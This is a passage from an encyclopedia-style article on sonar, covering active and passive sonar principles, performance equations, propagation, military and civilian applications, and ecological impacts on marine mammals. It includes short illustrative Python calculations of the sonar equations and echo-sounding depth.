e.g. a hybrid magnetostrictive-piezoelectric transducer. The most recent of these improved magnetostrictive materials is Galfenol. Other types of transducers include variable-reluctance (or moving-armature, or electromagnetic) transducers, where magnetic force acts on the surfaces of gaps, and moving coil (or electrodynamic) transducers, similar to conventional speakers; the latter are used in underwater sound calibration, due to their very low resonance frequencies and flat broadband characteristics above them.
Generally, the electro-acoustic transducers are of the Tonpilz type and their design may be optimised to achieve maximum efficiency over the widest bandwidth, in order to optimise performance of the overall system. Occasionally, the acoustic pulse may be created by other means, e.g. chemically using explosives, airguns or plasma sound sources. To measure the distance to an object, the time from transmission of a pulse to reception is measured and converted into a range using the known speed of sound. To measure the bearing, several hydrophones are used, and the set measures the relative arrival time to each, or with an array of hydrophones, by measuring the relative amplitude in beams formed through a process called beamforming. Use of an array narrows the spatial response, so multibeam systems are used to provide wide cover. The target signal (if present) together with noise is then passed through various forms of signal processing, which for simple sonars may be just energy measurement. It is then presented to some form of decision device that calls the output either the required signal or noise. This decision device may be an operator with headphones or a display, or in more sophisticated sonars this function may be carried out by software. Further processes may be carried out to classify the target and localise it, as well as measuring its velocity. The pulse may be at constant frequency or a chirp of changing frequency (to allow pulse compression on reception). Simple sonars generally use the former with a filter wide enough to cover possible Doppler changes due to target movement, while more complex ones generally include the latter technique. Since digital processing became available, pulse compression has usually been implemented using digital correlation techniques. Military sonars often have multiple beams to provide all-round cover while simple ones only cover a narrow arc, although the beam may be rotated, relatively slowly, by mechanical scanning. Particularly when single frequency transmissions are used, the Doppler effect can be used to measure the radial speed of a target. The difference in frequency between the transmitted and received signal is measured and converted into a velocity. Since Doppler shifts can be introduced by either receiver or target motion, allowance has to be made for the radial speed of the searching platform. One useful small sonar is similar in appearance to a waterproof flashlight. The head is pointed into the water, a button is pressed, and the device displays the distance to the target. Another variant is a "fishfinder" that shows a small display with shoals of fish. Some civilian sonars (which are not designed for stealth) approach active military sonars in capability, with three-dimensional displays of the area near the boat. When active sonar is used to measure the distance from the transducer to the bottom, it is known as echo sounding. Similar methods may be used looking upward for wave measurement. Active sonar is also used to measure distance through water between two sonar transducers or a combination of a hydrophone (underwater acoustic microphone) and projector (underwater acoustic speaker). When a hydrophone/transducer receives a specific interrogation signal, it responds by transmitting a specific reply signal. To measure distance, one transducer/projector transmits an interrogation signal and measures the time between this transmission and the receipt of the other transducer/hydrophone reply.
The time difference, scaled by the speed of sound through water and divided by two, is the distance between the two platforms. This technique, when used with multiple transducers/hydrophones/projectors, can calculate the relative positions of static and moving objects in water. In combat situations, an active pulse can be detected by an enemy and will reveal a submarine's position at twice the maximum distance that the submarine can itself detect a contact and give clues as to the submarine's identity based on the characteristics of the outgoing ping. For these reasons, active sonar is not frequently used by military submarines. A very directional, but low-efficiency, type of sonar (used by fisheries, military, and for port security) makes use of a complex nonlinear feature of water known as non-linear sonar, the virtual transducer being known as a parametric array. Project Artemis Project Artemis was an experimental research and development project from the late 1950s to the mid-1960s to examine acoustic propagation and signal processing for a low-frequency active sonar system that might be used for ocean surveillance. A secondary objective was examination of engineering problems of fixed active bottom systems. The receiving array was located on the slope of Plantagenet Bank off Bermuda. The active source array was deployed from a converted World War II tanker. Elements of Artemis were used experimentally after the main experiment was terminated. Transponder This is an active sonar device that receives a specific stimulus and immediately (or with a delay) retransmits the received signal or a predetermined one. Transponders can be used to remotely activate or recover subsea equipment. Performance prediction A sonar target is small relative to the sphere, centred around the emitter, on which it is located. Therefore, the power of the reflected signal is very low, several orders of magnitude less than the original signal. Even if the reflected signal were of the same power, the following example (using hypothetical values) shows the problem: Suppose a sonar system is capable of emitting a 10,000 W/m2 signal at 1 m, and detecting a 0.001 W/m2 signal. At 100 m the signal will be 1 W/m2 (due to the inverse-square law). If the entire signal is reflected from a 10 m2 target, it will be at 0.001 W/m2 when it reaches the emitter, i.e. just detectable. However, the original signal will remain above 0.001 W/m2 until 3000 m. Any 10 m2 target between 100 and 3000 m using a similar or better system would be able to detect the pulse, but would not be detected by the emitter. The detectors must be very sensitive to pick up the echoes. Since the original signal is much more powerful, it can be detected many times further than twice the range of the sonar (as in the example). Active sonar has two performance limitations, due to noise and reverberation. In general, one or other of these will dominate, so that the two effects can be initially considered separately. In noise-limited conditions at initial detection: SL − 2PL + TS − (NL − AG) = DT, where SL is the source level, PL is the propagation loss (sometimes referred to as transmission loss), TS is the target strength, NL is the noise level, AG is the array gain of the receiving array (sometimes approximated by its directivity index) and DT is the detection threshold. In reverberation-limited conditions at initial detection (neglecting array gain): SL − 2PL + TS = RL + DT, where RL is the reverberation level, and the other factors are as before.
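To make the equations above concrete, the sketch below evaluates the noise-limited active sonar equation for a set of made-up parameter values, with propagation loss modelled as simple spherical spreading plus absorption, and adds the standard monostatic Doppler relation discussed earlier. All numbers are illustrative assumptions, not measurements of any real system.

```python
# Illustrative evaluation of the noise-limited active sonar equation,
#   signal excess SE = SL - 2*PL + TS - (NL - AG) - DT,
# with one-way propagation loss modelled as spherical spreading plus
# absorption: PL = 20*log10(r) + alpha*r. All values are made up.
import math

def propagation_loss(range_m: float, alpha_db_per_km: float = 0.08) -> float:
    """One-way propagation loss in dB (spherical spreading + absorption)."""
    return 20 * math.log10(range_m) + alpha_db_per_km * range_m / 1000.0

def signal_excess(sl, ts, nl, ag, dt, range_m):
    """Positive signal excess means detection is expected at this range."""
    pl = propagation_loss(range_m)
    return sl - 2 * pl + ts - (nl - ag) - dt

def doppler_radial_speed(f_transmit_hz, f_shift_hz, sound_speed=1500.0):
    """Radial target speed (m/s) from the two-way (monostatic) Doppler shift."""
    return sound_speed * f_shift_hz / (2 * f_transmit_hz)

# Hypothetical active sonar: 220 dB source level, 15 dB target strength,
# 70 dB noise level, 20 dB array gain, 10 dB detection threshold.
for r in (1_000, 5_000, 10_000, 20_000):
    se = signal_excess(sl=220, ts=15, nl=70, ag=20, dt=10, range_m=r)
    print(f"range {r:>6} m: signal excess {se:+6.1f} dB")

# A 10 Hz shift on a 10 kHz ping corresponds to ~0.75 m/s radial speed.
print(f"doppler speed: {doppler_radial_speed(10_000, 10):.2f} m/s")
```

With these assumed figures the signal excess falls to roughly zero near 20 km, illustrating how the equation trades source level and array gain against spreading and absorption losses.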
Upward looking sonar An upward looking sonar (ULS) is a sonar device pointed upwards looking towards the surface of the sea. It is used for similar purposes as downward looking sonar, but has some unique applications such as measuring sea ice thickness, roughness and concentration, or measuring air entrainment from bubble plumes during rough seas. Often it is moored on the bottom of the ocean or floats on a taut line mooring at a constant depth of perhaps 100 m. They may also be used by submarines, AUVs, and floats such as the Argo float. Passive sonar Passive sonar listens without transmitting. It is often employed in military settings, although it is also used in science applications, e.g., detecting fish for presence/absence studies in various aquatic environments – see also passive acoustics and passive radar. In the very broadest usage, this term can encompass virtually any analytical technique involving remotely generated sound, though it is usually restricted to techniques applied in an aquatic environment. Identifying sound sources Passive sonar has a wide variety of techniques for identifying the source of a detected sound. For example, U.S. vessels usually operate 60 Hertz (Hz) alternating current power systems. If transformers or generators are mounted without proper vibration insulation from the hull or become flooded, the 60 Hz sound from the windings can be emitted from the submarine or ship. This can help to identify its nationality, as all European submarines and nearly every other nation's submarine have 50 Hz power systems. Intermittent sound sources (such as a wrench being dropped), called "transients," may also be detectable to passive sonar. Until fairly recently, an experienced, trained operator identified signals, but now computers may do this. Passive sonar systems may have large sonic databases, but final classification of the signals is usually done manually by the sonar operator. A computer system frequently uses these databases to identify classes of ships, actions (i.e. the speed of a ship, or the type of weapon released and the most effective countermeasures to employ), and even particular ships. Noise limitations Passive sonar on vehicles is usually severely limited because of noise generated by the vehicle. For this reason, many submarines operate nuclear reactors that can be cooled without pumps, using silent convection, or fuel cells or batteries, which can also run silently. Vehicles' propellers are also designed and precisely machined to emit minimal noise. High-speed propellers often create tiny bubbles in the water, and this cavitation has a distinct sound. The sonar hydrophones may be towed behind the ship or submarine in order to reduce the effect of noise generated by the watercraft itself. Towed units also combat the thermocline, as the unit may be towed above or below the thermocline. The display of most passive sonars used to be a two-dimensional waterfall display. The horizontal direction of the display is bearing.
The vertical is frequency, or sometimes time. Another display technique is to color-code frequency-time information for bearing. More recent displays are generated by computers and mimic radar-type plan position indicator displays. Performance prediction Unlike with active sonar, only one-way propagation is involved. Because of the different signal processing used, the minimal detectable signal-to-noise ratio will be different. The equation for determining the performance of a passive sonar is SL − PL = NL − AG + DT, where SL is the source level, PL is the propagation loss, NL is the noise level, AG is the array gain and DT is the detection threshold. The figure of merit of a passive sonar is FOM = SL + AG − (NL + DT). Performance factors The detection, classification and localisation performance of a sonar depends on the environment and the receiving equipment, as well as the transmitting equipment in an active sonar or the target radiated noise in a passive sonar. Sound propagation Sonar operation is affected by variations in sound speed, particularly in the vertical plane. Sound travels more slowly in fresh water than in sea water, though the difference is small. The speed is determined by the water's bulk modulus and mass density. The bulk modulus is affected by temperature, dissolved impurities (usually salinity), and pressure. The density effect is small. The speed of sound (in feet per second) is approximately: 4388 + (11.25 × temperature (in °F)) + (0.0182 × depth (in feet)) + salinity (in parts-per-thousand). This empirically derived approximation equation is reasonably accurate for normal temperatures, concentrations of salinity and the range of most ocean depths. Ocean temperature varies with depth, but at between 30 and 100 meters there is often a marked change, called the thermocline, dividing the warmer surface water from the cold, still waters that make up the rest of the ocean. This can frustrate sonar, because a sound originating on one side of the thermocline tends to be bent, or refracted, through the thermocline. The thermocline may be present in shallower coastal waters. However, wave action will often mix the water column and eliminate the thermocline. Water pressure also affects sound propagation: higher pressure increases the sound speed, which causes the sound waves to refract away from the area of higher sound speed. The mathematical model of refraction is called Snell's law. If the sound source is deep and the conditions are right, propagation may occur in the 'deep sound channel'. This provides extremely low propagation loss to a receiver in the channel. This is because of sound trapping in the channel with no losses at the boundaries. Similar propagation can occur in the 'surface duct' under suitable conditions. However, in this case there are reflection losses at the surface. In shallow water propagation is generally by repeated reflection at the surface and bottom, where considerable losses can occur. Sound propagation is affected by absorption in the water itself as well as at the surface and bottom. This absorption depends upon frequency, with several different mechanisms in sea water. Long-range sonar uses low frequencies to minimise absorption effects. The sea contains many sources of noise that interfere with the desired target echo or signature. The main noise sources are waves and shipping. The motion of the receiver through the water can also cause speed-dependent low frequency noise.
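Both the passive sonar figure of merit and the empirical sound-speed approximation quoted above are simple enough to compute directly. The sketch below implements them exactly as written in the text; the sample inputs are arbitrary illustrative values.

```python
# The empirical sound-speed approximation quoted above (imperial units):
#   c (ft/s) = 4388 + 11.25*T(F) + 0.0182*depth(ft) + salinity(ppt)
# and the passive sonar figure of merit: FOM = SL + AG - (NL + DT).
# All sample inputs below are arbitrary illustrative values.

def sound_speed_fps(temp_f: float, depth_ft: float, salinity_ppt: float) -> float:
    """Approximate speed of sound in sea water, in feet per second."""
    return 4388 + 11.25 * temp_f + 0.0182 * depth_ft + salinity_ppt

def passive_figure_of_merit(sl: float, ag: float, nl: float, dt: float) -> float:
    """Maximum allowable one-way propagation loss for detection, in dB."""
    return sl + ag - (nl + dt)

# 59 F water at 300 ft depth with typical open-ocean salinity (~35 ppt):
c = sound_speed_fps(temp_f=59.0, depth_ft=300.0, salinity_ppt=35.0)
print(f"sound speed ~ {c:.0f} ft/s (~{c * 0.3048:.0f} m/s)")

# Hypothetical quiet target (140 dB source level) against 65 dB noise,
# with 15 dB array gain and a 10 dB detection threshold:
print(f"figure of merit: {passive_figure_of_merit(140, 15, 65, 10):.0f} dB")
```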
Scattering When active sonar is used, scattering occurs from small objects in the sea as well as from the bottom and surface. This can be a major source of interference. This acoustic scattering is analogous to the scattering of the light from a car's headlights in fog: a high-intensity pencil beam will penetrate the fog to some extent, but broader-beam headlights emit much light in unwanted directions, much of which is scattered back to the observer, overwhelming that reflected from the target ("white-out"). For analogous reasons active sonar needs to transmit in a narrow beam to minimize scattering. The scattering of sonar from objects (mines, pipelines, zooplankton, geological features, fish etc.) is how active sonar detects them, but this ability can be masked by strong scattering from false targets, or 'clutter'. Where they occur (under breaking waves; in ship wakes; in gas emitted from seabed seeps and leaks etc.), gas bubbles are powerful sources of clutter, and can readily hide targets. TWIPS (Twin Inverted Pulse Sonar) is currently the only sonar that can overcome this clutter problem. This is important as many recent conflicts have occurred in coastal waters, and the inability to detect whether mines are present or not presents hazards and delays to military vessels, and also to aid convoys and merchant shipping trying to support the region long after the conflict has ceased. Target characteristics The sound reflection characteristics of the target of an active sonar, such as a submarine, are known as its target strength. A complication is that echoes are also obtained from other objects in the sea such as whales, wakes, schools of fish and rocks. Passive sonar detects the target's radiated noise characteristics. The radiated spectrum comprises a continuous spectrum of noise with peaks at certain frequencies which can be used for classification. Countermeasures Active (powered) countermeasures may be launched by a vessel under attack to raise the noise level, provide a large false target, and obscure the signature of the vessel itself. Passive (i.e., non-powered) countermeasures include mounting noise-generating devices on isolating devices, and sound-absorbent coatings on the hulls of submarines, for example anechoic tiles. Military applications Modern naval warfare makes extensive use of both passive and active sonar from water-borne vessels, aircraft and fixed installations. Although active sonar was used by surface craft in World War II, submarines avoided the use of active sonar due to the potential for revealing their presence and position to enemy forces. However, the advent of modern signal-processing enabled the use of passive sonar as a primary means for search and detection operations. In 1987 a division of Japanese company Toshiba reportedly sold machinery to the Soviet Union that allowed their submarine propeller blades to be milled so that they became radically quieter, making the newer generation of submarines more difficult to detect. The use of active sonar by a submarine to determine bearing is extremely rare and will not necessarily give high quality bearing or range information to the submarine's fire control team. However, use of active sonar on surface ships is very common and is used by submarines when the tactical situation dictates that it is more important to determine the position of a hostile submarine than to conceal their own position.
With surface ships, it might be assumed that the threat is already tracking the ship with satellite data, as any vessel around the emitting sonar will detect the emission. Having heard the signal, it is easy to identify the sonar equipment used (usually with its frequency) and its position (with the sound wave's energy). Active sonar is similar to radar in that, while it allows detection of targets at a certain range, it also enables the emitter to be detected at a far greater range, which is undesirable. Since active sonar reveals the presence and position of the operator, and does not allow exact classification of targets, it is used by fast platforms (planes, helicopters) and by noisy ones (most surface ships), but rarely by submarines. When active sonar is used by surface ships or submarines, it is typically activated very briefly at intermittent periods to minimize the risk of detection. Consequently, active sonar is normally considered a backup to passive sonar. In aircraft, active sonar is used in the form of disposable sonobuoys that are dropped in the aircraft's patrol area or in the vicinity of possible enemy sonar contacts. Passive sonar has several advantages, most importantly that it is silent. If the target radiated noise level is high enough, it can have a greater range than active sonar, and allows the target to be identified. Since any motorized object makes some noise, it may in principle be detected, depending on the level of noise emitted and the ambient noise level in the area, as well as the technology used. To simplify, passive sonar "sees" around the ship using it. On a submarine, nose-mounted passive sonar detects in directions of about 270°, centered on the ship's alignment, the hull-mounted array of about 160° on each side, and the towed array of a full 360°. The invisible areas are due to the ship's own interference. Once a signal is detected in a certain direction (which means that something is making sound in that direction; this is called broadband detection), it is possible to zoom in and analyze the signal received (narrowband analysis). This is generally done using a Fourier transform to show the different frequencies making up the sound. Since every engine makes a specific sound, it is straightforward to identify the object. Databases of unique engine sounds are part of what is known as acoustic intelligence or ACINT. Another use of passive sonar is to determine the target's trajectory. This process is called target motion analysis (TMA), and the resultant "solution" is the target's range, course, and speed. TMA is done by marking from which direction the sound comes at different times, and comparing the motion with that of the operator's own ship. Changes in relative motion are analyzed using standard geometrical techniques along with some assumptions about limiting cases. Passive sonar is stealthy and very useful. However, it requires high-tech electronic components and is costly. It is generally deployed on expensive ships in the form of arrays to enhance detection. Surface ships use it to good effect; it is even better used by submarines, and it is also used by airplanes and helicopters, mostly for a "surprise effect", since submarines can hide under thermal layers. If a submarine's commander believes he is alone, he may bring his boat closer to the surface and be easier to detect, or go deeper and faster, and thus make more sound. Examples of sonar applications in military use are given below.
Many of the civil uses given in the following section may also be applicable to naval use. Anti-submarine warfare Until recently, ship sonars were usually made with hull mounted arrays, either amidships or at the bow. It was soon found after their initial use that a means of reducing flow noise was required. The first sonar domes were made of canvas on a framework; then steel ones were used. Now domes are usually made of reinforced plastic or pressurized rubber. Such sonars are primarily active in operation. An example of a conventional hull mounted sonar is the SQS-56. Because of the problems of ship noise, towed sonars are also used. These have the advantage of being able to be placed deeper in the water, but have limitations on their use in shallow water. These are called towed arrays (linear) or variable depth sonars (VDS) with 2/3D arrays. A problem is that the winches required to deploy/recover them are large and expensive. VDS sets are primarily active in operation, while towed arrays are passive. An example of a modern active-passive ship towed sonar is Sonar 2087 made by Thales Underwater Systems. Torpedoes Modern torpedoes are generally fitted with an active/passive sonar. This may be used to home directly on the target, but wake homing torpedoes are also used. An early example of an acoustic homer was the Mark 37 torpedo. Torpedo countermeasures can be towed or free. An early example was the German Sieglinde device, while the Bold was a chemical device. A widely used US device was the towed AN/SLQ-25 Nixie, while the mobile submarine simulator (MOSS) was a free device. A modern alternative to the Nixie system is the UK Royal Navy S2170 Surface Ship Torpedo Defence system. Mines Mines may be fitted with a sonar to detect, localize and recognize the required target. An example is the CAPTOR mine. Mine countermeasures Mine countermeasure (MCM) sonar, sometimes called "mine and obstacle avoidance sonar (MOAS)", is a specialized type of sonar used for detecting small objects. Most MCM sonars are hull mounted but a few types are VDS design. An example of a hull mounted MCM sonar is the Type 2193, while the SQQ-32 mine-hunting sonar and Type 2093 systems are VDS designs. Submarine navigation Submarines rely on sonar to a greater extent than surface ships as they cannot use radar in water. The sonar arrays may be hull mounted or towed. Aircraft Helicopters can be used for antisubmarine warfare by deploying fields of active-passive sonobuoys or can operate dipping sonar, such as the AQS-13. Fixed wing aircraft can also deploy sonobuoys and have greater endurance and capacity to deploy them. Processing from the sonobuoys or dipping sonar can be on the aircraft or on ship. Dipping sonar has the advantage of being deployable to depths appropriate to daily conditions. Helicopters have also been used for mine countermeasure missions using towed sonars such as the AQS-20A. Underwater communications Dedicated sonars can be fitted to ships and submarines for underwater communication. Ocean surveillance The United States began a system of passive, fixed ocean surveillance systems in 1950 with the classified name Sound Surveillance System (SOSUS), with American Telephone and Telegraph Company (AT&T), with its Bell Laboratories research and Western Electric manufacturing entities, being contracted for development and installation.
The systems exploited the SOFAR channel, also known as the deep sound channel, where a sound speed minimum creates a waveguide in which low-frequency sound travels thousands of miles. Analysis was based on an AT&T sound spectrograph, which converted sound into a visual spectrogram representing a time–frequency analysis of sound; it had been developed for speech analysis and was modified to analyze low-frequency underwater sounds. That process was Low Frequency Analysis and Recording, and the equipment was termed the Low Frequency Analyzer and Recorder, both with the acronym LOFAR. LOFAR research was termed Jezebel and led to usage in air and surface systems, particularly sonobuoys using the process and sometimes using "Jezebel" in their name. The proposed system offered such promise of long-range submarine detection that the Navy ordered immediate moves for implementation. Between 1951, when a test array and then a full-scale, forty-element prototype operational array were installed, and 1958, systems were laid in the Atlantic and then the Pacific under the unclassified name Project Caesar. The original systems were terminated at classified shore stations designated Naval Facility (NAVFAC), explained as engaging in "ocean research" to cover their classified mission. The system was upgraded multiple times, with more advanced cable allowing the arrays to be installed in ocean basins, and with upgraded processing. The shore stations were eliminated in a process of consolidation and rerouting of the arrays to central processing centers into the 1990s. In 1985, with new mobile arrays and other systems becoming operational, the collective system name was changed to Integrated Undersea Surveillance System (IUSS). In 1991, the mission of the system was declassified; the year before, IUSS insignia had been authorized for wear. Access was granted to some systems for scientific research. A similar system is believed to have been operated by the Soviet Union. Underwater security Sonar can be used to detect frogmen and other scuba divers. This can be applicable around ships or at entrances to ports. Active sonar can also be used as a deterrent and/or disablement mechanism. One such device is the Cerberus system. Hand-held sonar Limpet mine imaging sonar (LIMIS) is a hand-held or ROV-mounted imaging sonar designed for patrol divers (combat frogmen or clearance divers) to look for limpet mines in low-visibility water. The LUIS is another imaging sonar for use by a diver. The integrated navigation sonar system (INSS) is a small flashlight-shaped handheld sonar for divers that displays range. Intercept sonar This is a sonar designed to detect and locate the transmissions from hostile active sonars. An example of this is the Type 2082 fitted on British submarines. Civilian applications Fisheries Fishing is an important industry that is seeing growing demand, but world catch tonnage is falling as a result of serious resource problems. The industry faces a future of continuing worldwide consolidation until a point of sustainability can be reached. However, the consolidation of the fishing fleets is driving increased demand for sophisticated fish-finding electronics such as sensors, sounders and sonars. Historically, fishermen have used many different techniques to find and harvest fish. However, acoustic technology has been one of the most important driving forces behind the development of the modern commercial fisheries.
Sound waves travel differently through fish than through water because a fish's air-filled swim bladder has a different density than seawater. This density difference allows the detection of schools of fish by using reflected sound. Acoustic technology is especially well suited for underwater applications, since sound travels farther and faster underwater than in air. Today, commercial fishing vessels rely almost completely on acoustic sonar and sounders to detect fish. Fishermen also use active sonar and echo sounder technology to determine water depth, bottom contour, and bottom composition. Companies such as eSonar, Raymarine, Marport Canada, Wesmar, Furuno, Krupp, and Simrad make a variety of sonar and acoustic instruments for the deep-sea commercial fishing industry. For example, net sensors take various underwater measurements and transmit the information back to a receiver on board a vessel. Each sensor is equipped with one or more acoustic transducers depending on its specific function. Data is transmitted from the sensors using wireless acoustic telemetry and is received by a hull-mounted hydrophone. The analog signals are decoded and converted by a digital acoustic receiver into data which is transmitted to a bridge computer for graphical display on a high-resolution monitor. Echo sounding Echo sounding is a process used to determine the depth of water beneath ships and boats. A type of active sonar, echo sounding is the transmission of an acoustic pulse directly downwards to the seabed and the measurement of the time between transmission and the echo's return after it hits the bottom and bounces back to its ship of origin. The acoustic pulse is emitted by a transducer, which also receives the return echo. The depth measurement is calculated by multiplying the speed of sound in water (averaging 1,500 meters per second) by half the time between emission and echo return, since the pulse must travel to the bottom and back. The value of underwater acoustics to the fishing industry has led to the development of other acoustic instruments that operate in a similar fashion to echo-sounders but, because their function is slightly different from the initial model of the echo-sounder, have been given different terms. Net location The net sounder is an echo sounder with a transducer mounted on the headline of the net rather than on the bottom of the vessel. However, to accommodate the distance from the transducer to the display unit, which is much greater than in a normal echo-sounder, several refinements have to be made. Two main types are available. The first is the cable type, in which the signals are sent along a cable. In this case, a cable drum is needed on which to haul, shoot and stow the cable during the different phases of the operation. The second type is the cable-less net-sounder – such as Marport's Trawl Explorer – in which the signals are sent acoustically between the net and a hull-mounted receiver-hydrophone on the vessel. In this case, no cable drum is required, but sophisticated electronics are needed at the transducer and receiver. The display on a net sounder shows the distance of the net from the bottom (or the surface), rather than the depth of water as with the echo-sounder's hull-mounted transducer. With the transducer fixed to the headline of the net, the footrope can usually be seen, which gives an indication of the net's performance. Any fish passing into the net can also be seen, allowing fine adjustments to be made to catch the most fish possible.
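Returning to the echo-sounding depth calculation described above, a minimal Python sketch; the 1,500 m/s figure is the nominal average quoted above, and real echo sounders apply corrections for temperature, salinity, and pressure:

SPEED_OF_SOUND_SEAWATER = 1500.0   # m/s, nominal average quoted above

def depth_from_echo(round_trip_seconds, sound_speed=SPEED_OF_SOUND_SEAWATER):
    # The pulse travels down to the seabed and back, so the one-way
    # depth uses half the measured round-trip time.
    return sound_speed * round_trip_seconds / 2.0

# A ping whose echo returns after 0.2 s implies roughly 150 m of water.
print(depth_from_echo(0.2))  # -> 150.0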
In other fisheries, where the amount of fish in the net is important, catch sensor transducers are mounted at various positions on the cod-end of the net. As the cod-end fills up, these catch sensor transducers are triggered one by one, and this information is transmitted acoustically to display monitors on the bridge of the vessel. The skipper can then decide when to haul the net. Modern versions of the net sounder, using multiple-element transducers, function more like a sonar than an echo sounder and show slices of the area in front of the net, not merely the vertical view that the initial net sounders used. The sonar is an echo-sounder with a directional capability that can show fish or other objects around the vessel. ROV and UUV Small sonars have been fitted to remotely operated vehicles (ROVs) and unmanned underwater vehicles (UUVs) to allow their operation in murky conditions. These sonars are used for looking ahead of the vehicle. The Long-Term Mine Reconnaissance System is a UUV for MCM purposes. Vehicle location Sonars which act as beacons are fitted to aircraft to allow their location in the event of a crash in the sea. Short baseline and long baseline (LBL) sonars may be used to carry out the location. Prosthesis for the visually impaired In 2013 an inventor in the United States unveiled a "spider-sense" bodysuit, equipped with ultrasonic sensors and haptic feedback systems, which alerts the wearer to incoming threats, allowing them to respond to attackers even when blindfolded. Scientific applications Biomass estimation Biomass estimation is the detection of fish and other marine and aquatic life, and the estimation of their individual sizes or total biomass, using active sonar techniques. Sound pulses reflect off any object that has a different density than the surrounding medium. This includes fish, or more specifically, the air-filled swim bladder of a fish. These echoes provide information on fish size, location, abundance and behavior. This is especially effective for fish with swim bladders (e.g. herring, cod, and pollock), and less useful for fish without them (e.g. sharks, mackerel, and flounder). Data from the water column is usually processed differently from seafloor or object-detection data, and can be processed with specialized software. Wave measurement An upward-looking echo sounder mounted on the bottom or on a platform may be used to make measurements of wave height and period. From this, statistics of the surface conditions at a location can be derived. Water velocity measurement Special short-range sonars have been developed to allow measurements of water velocity. Bottom type assessment Sonars have been developed that can be used to characterise the sea bottom into, for example, mud, sand, and gravel. Relatively simple sonars such as echo sounders can be promoted to seafloor classification systems via add-on modules, converting echo parameters into sediment type. Different algorithms exist, but they are all based on changes in the energy or shape of the reflected sounder pings. Advanced substrate classification analysis can be achieved using calibrated (scientific) echosounders and parametric or fuzzy-logic analysis of the acoustic data. Bathymetric mapping Side-scan sonars can be used to derive maps of seafloor topography (bathymetry) by moving the sonar across it just above the bottom. Low-frequency sonars such as GLORIA have been used for continental-shelf-wide surveys, while high-frequency sonars are used for more detailed surveys of smaller areas.
Hull-mounted multibeam echosounders on large surface vessels produce swathes of bathymetric data in near real time. One example, the General Instrument "Seabeam" system, uses a projector array along the keel to ensonify the bottom with a fan beam. Signals from a hydrophone array mounted athwartships are processed to synthesize multiple virtual fan beams crossing the projector beam at right angles. Sonar imaging Sonar imaging is the creation of two- and three-dimensional images using sonar data. Sub-bottom profiling Powerful low-frequency echo-sounders have been developed for providing profiles of the upper layers of the ocean bottom. One of the most recent devices is Innomar's SES-2000 quattro multi-transducer parametric SBP, used for example in the Puck Bay for underwater archaeological purposes. Gas leak detection from the seabed Gas bubbles can leak from the seabed, or close to it, from multiple sources. These can be detected by both passive and active sonar. Natural seeps of methane and carbon dioxide occur. Gas pipelines can leak, and it is important to be able to detect whether leakage occurs from carbon capture and storage facilities (CCSFs; e.g. depleted oil wells into which extracted atmospheric carbon is stored). Quantification of the amount of gas leaking is difficult, and although estimates can be made using active and passive sonar, it is important to question their accuracy because of the assumptions inherent in making such estimations from sonar data. Synthetic aperture sonar Various synthetic aperture sonars have been built in the laboratory and some have entered use in mine-hunting and search systems. An explanation of their operation is given in synthetic aperture sonar. Parametric sonar Parametric sources use the non-linearity of water to generate the difference frequency between two high frequencies. A virtual end-fire array is formed. Such a projector has advantages of broad bandwidth and narrow beamwidth, and when fully developed and carefully measured it has no obvious sidelobes: see parametric array. Its major disadvantage is very low efficiency of only a few percent. P. J. Westervelt summarized the trends involved. Sonar in extraterrestrial contexts The use of both active and passive sonar has been proposed for various extraterrestrial environments. One example is Titan, where active sonar could be used to determine the depth of its hydrocarbon seas, and passive sonar could be used to detect methanefalls. Proposals that do not take proper account of the difference between terrestrial and extraterrestrial environments could lead to erroneous measurements. Ecological impact Effect on marine mammals Research has shown that use of active sonar can lead to mass strandings of marine mammals. Beaked whales, the most common casualty of the strandings, have been shown to be highly sensitive to mid-frequency active sonar. Other marine mammals, such as the blue whale, also flee from the source of the sonar, and naval activity was suggested to be the most probable cause of a mass stranding of dolphins. The US Navy, which part-funded some of the studies, said that the findings only showed behavioural responses to sonar, not actual harm, but they "will evaluate the effectiveness of [their] marine mammal protective measures in light of new research findings". A 2008 US Supreme Court ruling on the use of sonar by the US Navy noted that there had been no cases where sonar had been conclusively shown to have harmed or killed a marine mammal.
Some marine animals, such as whales and dolphins, use echolocation systems, sometimes called biosonar, to locate predators and prey. Research on the effects of sonar on blue whales in the Southern California Bight shows that mid-frequency sonar use disrupts the whales' feeding behavior. This indicates that sonar-induced disruption of feeding and displacement from high-quality prey patches could have significant and previously undocumented impacts on baleen whale foraging ecology, individual fitness and population health. A review of evidence on the mass strandings of beaked whales linked to naval exercises where sonar was used was published in 2019. It concluded that the effects of mid-frequency active sonar are strongest on Cuvier's beaked whales but vary among individuals or populations. The review suggested the strength of response of individual animals may depend on whether they had prior exposure to sonar, and that symptoms of decompression sickness have been found in stranded whales that may be a result of such response to sonar. It noted that in the Canary Islands, where multiple strandings had previously been reported, no more mass strandings occurred once naval exercises during which sonar was used were banned in the area, and recommended that the ban be extended to other areas where mass strandings continue to occur. Effect on fish Low-frequency sonar can create a small temporary shift in the hearing threshold of some fish. Frequencies and resolutions The frequencies of sonars range from infrasonic to above a megahertz. Generally, the lower frequencies have longer range, while the higher frequencies offer better resolution and smaller size for a given directionality. To achieve reasonable directionality, frequencies below 1 kHz generally require large size, usually achieved as towed arrays. Low-frequency sonars are loosely defined as 1–5 kHz, although some navies regard 5–7 kHz also as low frequency. Medium frequency is defined as 5–15 kHz. Another style of division considers low frequency to be under 1 kHz, and medium frequency between 1–10 kHz. American World War II-era sonars operated at a relatively high frequency of 20–30 kHz to achieve directionality with reasonably small transducers, with a typical maximum operational range of 2500 yd. Postwar sonars used lower frequencies to achieve longer range; e.g. the SQS-4 operated at 10 kHz with a range up to 5000 yd. The SQS-26 and SQS-53 operated at 3 kHz with a range up to 20,000 yd; their domes were approximately the size of a 60-ft personnel boat, an upper size limit for conventional hull sonars. Achieving larger sizes by a conformal sonar array spread over the hull has not been effective so far; for lower frequencies, linear or towed arrays are therefore used. Japanese WW2 sonars operated at a range of frequencies. The Type 91, with a 30-inch quartz projector, worked at 9 kHz. The Type 93, with smaller quartz projectors, operated at 17.5 kHz (model 5 at 16 or 19 kHz magnetostrictive) at powers between 1.7 and 2.5 kilowatts, with a range of up to 6 km. The later Type 3, with German-design magnetostrictive transducers, operated at 13, 14.5, 16, or 20 kHz (by model), using twin transducers (except model 1, which had three single ones), at 0.2 to 2.5 kilowatts. The simple type used 14.5 kHz magnetostrictive transducers at 0.25 kW, driven by capacitive discharge instead of oscillators, with a range up to 2.5 km. The sonar's resolution is angular; objects further away are imaged with lower resolution than nearby ones.
